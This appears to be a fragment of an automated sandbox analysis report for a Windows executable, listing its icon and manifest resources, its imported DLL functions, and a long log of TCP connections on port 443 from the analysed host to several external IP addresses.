RT_ICON	0x47fa8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.02200402224062463
RT_ICON	0x587d0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.05402692489371753
RT_ICON	0x5c9f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.0766597510373444
RT_ICON	0x5efa0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.12781425891181988
RT_ICON	0x60048	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.28102836879432624
RT_GROUP_ICON	0x604b0	0x5a	data	0.7666666666666667
RT_MANIFEST	0x6050c	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:44:55.796857119 CET	49707	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:44:55.796904087 CET	443	49707	104.26.12.205	192.168.2.8
Dec 13, 2024 08:44:55.797982931 CET	49707	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:44:55.798887968 CET	49707	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:44:55.798899889 CET	443	49707	104.26.12.205	192.168.2.8
Dec 13, 2024 08:44:57.016303062 CET	443	49707	104.26.12.205	192.168.2.8
Dec 13, 2024 08:44:57.017553091 CET	49707	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:44:57.017564058 CET	443	49707	104.26.12.205	192.168.2.8
Dec 13, 2024 08:44:57.018950939 CET	443	49707	104.26.12.205	192.168.2.8
Dec 13, 2024 08:44:57.019016981 CET	49707	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:44:57.033386946 CET	49707	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:44:57.033536911 CET	443	49707	104.26.12.205	192.168.2.8
Dec 13, 2024 08:44:57.033580065 CET	49707	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:44:57.033689022 CET	49707	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:44:57.175947905 CET	49708	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:44:57.176000118 CET	443	49708	45.112.123.126	192.168.2.8
Dec 13, 2024 08:44:57.176059008 CET	49708	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:44:57.176826000 CET	49708	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:44:57.176837921 CET	443	49708	45.112.123.126	192.168.2.8
Dec 13, 2024 08:44:58.565197945 CET	443	49708	45.112.123.126	192.168.2.8
Dec 13, 2024 08:44:58.565643072 CET	49708	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:44:58.565665960 CET	443	49708	45.112.123.126	192.168.2.8
Dec 13, 2024 08:44:58.566726923 CET	443	49708	45.112.123.126	192.168.2.8
Dec 13, 2024 08:44:58.566807985 CET	49708	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:44:58.568249941 CET	49708	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:44:58.568393946 CET	443	49708	45.112.123.126	192.168.2.8
Dec 13, 2024 08:44:58.568413973 CET	49708	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:44:58.568437099 CET	49708	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:44:58.708313942 CET	49711	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:44:58.708411932 CET	443	49711	159.89.102.253	192.168.2.8
Dec 13, 2024 08:44:58.708498955 CET	49711	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:44:58.708956957 CET	49711	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:44:58.708992958 CET	443	49711	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:00.513504028 CET	443	49711	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:00.513943911 CET	49711	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:00.513963938 CET	443	49711	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:00.515028000 CET	443	49711	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:00.515083075 CET	49711	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:00.516582012 CET	49711	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:00.516730070 CET	49711	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:01.101665974 CET	49714	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:01.101699114 CET	443	49714	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:01.101766109 CET	49714	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:01.102305889 CET	49714	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:01.102315903 CET	443	49714	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:01.163835049 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:01.163855076 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:01.164139032 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:01.177280903 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:01.177289009 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:02.317420959 CET	443	49714	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:02.333170891 CET	49714	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:02.333214998 CET	443	49714	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:02.334554911 CET	443	49714	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:02.334633112 CET	49714	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:02.335721970 CET	49714	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:02.335942030 CET	443	49714	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:02.335992098 CET	49714	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:02.336131096 CET	49714	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:02.337502003 CET	49716	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:02.337600946 CET	443	49716	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:02.337691069 CET	49716	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:02.338253975 CET	49716	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:02.338288069 CET	443	49716	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:02.568964958 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:02.569041014 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:02.580825090 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:02.580846071 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:02.581204891 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:02.584379911 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:02.584441900 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:02.584481955 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:03.260523081 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:03.260608912 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:03.260688066 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:03.275522947 CET	49715	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:03.275552034 CET	443	49715	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:03.547370911 CET	443	49716	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:03.547964096 CET	49716	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:03.547983885 CET	443	49716	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:03.549247980 CET	443	49716	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:03.549355984 CET	49716	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:03.550395012 CET	49716	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:03.550575018 CET	443	49716	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:03.550579071 CET	49716	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:03.550694942 CET	49716	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:03.551742077 CET	49717	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:03.551850080 CET	443	49717	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:03.551945925 CET	49717	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:03.554974079 CET	49717	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:03.555011988 CET	443	49717	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:03.632113934 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:03.632221937 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:03.632436991 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:03.647418022 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:03.647455931 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:04.799941063 CET	443	49717	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:04.800710917 CET	49717	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:04.800739050 CET	443	49717	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:04.804368973 CET	443	49717	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:04.804450989 CET	49717	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:04.805972099 CET	49717	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:04.806118965 CET	49717	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:04.807677984 CET	49721	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:04.807717085 CET	443	49721	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:04.807821035 CET	49721	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:04.808192015 CET	49721	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:04.808204889 CET	443	49721	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:05.048861027 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:05.048934937 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:05.050309896 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:05.050319910 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:05.050539017 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:05.053487062 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:05.053719044 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:05.053721905 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:05.720989943 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:05.721081018 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:05.721137047 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:05.783993006 CET	49720	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:05.784028053 CET	443	49720	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:06.018450975 CET	443	49721	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:06.019094944 CET	49721	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:06.019109964 CET	443	49721	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:06.020168066 CET	443	49721	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:06.020219088 CET	49721	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:06.021441936 CET	49721	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:06.021574020 CET	443	49721	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:06.021585941 CET	49721	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:06.021610975 CET	49721	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:06.022624016 CET	49722	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:06.022670031 CET	443	49722	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:06.022764921 CET	49722	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:06.023040056 CET	49722	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:06.023051023 CET	443	49722	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:06.299321890 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:06.299343109 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:06.299463034 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:06.338449955 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:06.338465929 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:07.233500004 CET	443	49722	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:07.233954906 CET	49722	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:07.233983040 CET	443	49722	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:07.235035896 CET	443	49722	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:07.235104084 CET	49722	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:07.236355066 CET	49722	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:07.236495018 CET	443	49722	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:07.236702919 CET	49722	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:07.236856937 CET	49722	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:07.238940954 CET	49726	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:07.238979101 CET	443	49726	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:07.241599083 CET	49726	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:07.241599083 CET	49726	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:07.241640091 CET	443	49726	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:07.706372023 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:07.706446886 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:07.713000059 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:07.713011980 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:07.713279009 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:07.715915918 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:07.716039896 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:07.716057062 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:08.368573904 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:08.368712902 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:08.368807077 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:08.456645012 CET	443	49726	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:08.457392931 CET	49726	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:08.457408905 CET	443	49726	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:08.458920956 CET	443	49726	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:08.459048033 CET	49726	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:08.460864067 CET	49726	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:08.460864067 CET	49726	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:08.500489950 CET	49727	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:08.500536919 CET	443	49727	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:08.500660896 CET	49727	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:08.502943993 CET	49727	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:08.502966881 CET	443	49727	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:08.514597893 CET	49725	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:08.514621019 CET	443	49725	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:09.714524984 CET	443	49727	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:09.716996908 CET	49727	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.717016935 CET	443	49727	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:09.718022108 CET	443	49727	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:09.719084978 CET	49727	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.719084978 CET	49727	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.719223022 CET	443	49727	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:09.719307899 CET	49727	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.719307899 CET	49727	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.720442057 CET	49728	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.720482111 CET	443	49728	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:09.720659018 CET	49728	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.721350908 CET	49728	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.721365929 CET	443	49728	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:09.849843025 CET	49729	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.849886894 CET	443	49729	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:09.850497961 CET	49729	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.850497961 CET	49729	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:09.850545883 CET	443	49729	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:10.930758953 CET	443	49728	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:10.931334019 CET	49728	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:10.931348085 CET	443	49728	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:10.932410002 CET	443	49728	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:10.932514906 CET	49728	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:10.933955908 CET	49728	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:10.933955908 CET	49728	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:11.061681032 CET	443	49729	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:11.062279940 CET	49729	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:11.062293053 CET	443	49729	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:11.063261986 CET	443	49729	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:11.064450026 CET	49729	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:11.064450979 CET	49729	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:11.064450979 CET	49729	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:11.065645933 CET	49731	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:11.065679073 CET	443	49731	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:11.065783024 CET	49731	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:11.066134930 CET	49731	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:11.066143036 CET	443	49731	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:12.275612116 CET	443	49731	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:12.276979923 CET	49731	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:12.276998997 CET	443	49731	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:12.278096914 CET	443	49731	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:12.278158903 CET	49731	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:12.279167891 CET	49731	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:12.279375076 CET	443	49731	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:12.279376030 CET	49731	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:12.279511929 CET	49731	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:12.280925989 CET	49732	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:12.280977964 CET	443	49732	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:12.281044006 CET	49732	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:12.281332970 CET	49732	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:12.281337976 CET	443	49732	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:13.493272066 CET	443	49732	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:13.493700981 CET	49732	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:13.493730068 CET	443	49732	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:13.494784117 CET	443	49732	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:13.494847059 CET	49732	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:13.495806932 CET	49732	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:13.495937109 CET	443	49732	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:13.495950937 CET	49732	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:13.495980978 CET	49732	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:13.497159004 CET	49733	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:13.497208118 CET	443	49733	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:13.497287035 CET	49733	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:13.499809980 CET	49733	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:13.499825001 CET	443	49733	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:14.709908962 CET	443	49733	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:14.710378885 CET	49733	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:14.710407019 CET	443	49733	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:14.711469889 CET	443	49733	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:14.711586952 CET	49733	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:14.712701082 CET	49733	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:14.712837934 CET	443	49733	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:14.712837934 CET	49733	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:14.712913990 CET	49733	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:14.714126110 CET	49734	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:14.714174986 CET	443	49734	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:14.714293003 CET	49734	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:14.714603901 CET	49734	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:14.714618921 CET	443	49734	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:15.928695917 CET	443	49734	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:15.929305077 CET	49734	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:15.929335117 CET	443	49734	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:15.930434942 CET	443	49734	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:15.930536032 CET	49734	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:15.932069063 CET	49734	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:15.932260990 CET	443	49734	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:15.932282925 CET	49734	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:15.932310104 CET	49734	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:15.934115887 CET	49735	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:15.934179068 CET	443	49735	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:15.934278011 CET	49735	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:15.934839964 CET	49735	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:15.934853077 CET	443	49735	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:17.157493114 CET	443	49735	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:17.158073902 CET	49735	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:17.158103943 CET	443	49735	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:17.159153938 CET	443	49735	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:17.159241915 CET	49735	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:17.160187960 CET	49735	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:17.160326004 CET	49735	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:17.161603928 CET	49736	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:17.161690950 CET	443	49736	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:17.161772013 CET	49736	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:17.162225008 CET	49736	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:17.162256002 CET	443	49736	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:18.372229099 CET	443	49736	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:18.373029947 CET	49736	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:18.373049974 CET	443	49736	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:18.374053001 CET	443	49736	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:18.374119997 CET	49736	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:18.375689030 CET	49736	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:18.375813007 CET	443	49736	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:18.375864029 CET	49736	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:18.375890970 CET	49736	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:18.377404928 CET	49737	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:18.377459049 CET	443	49737	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:18.377542019 CET	49737	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:18.377863884 CET	49737	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:18.377877951 CET	443	49737	162.159.138.232	192.168.2.8
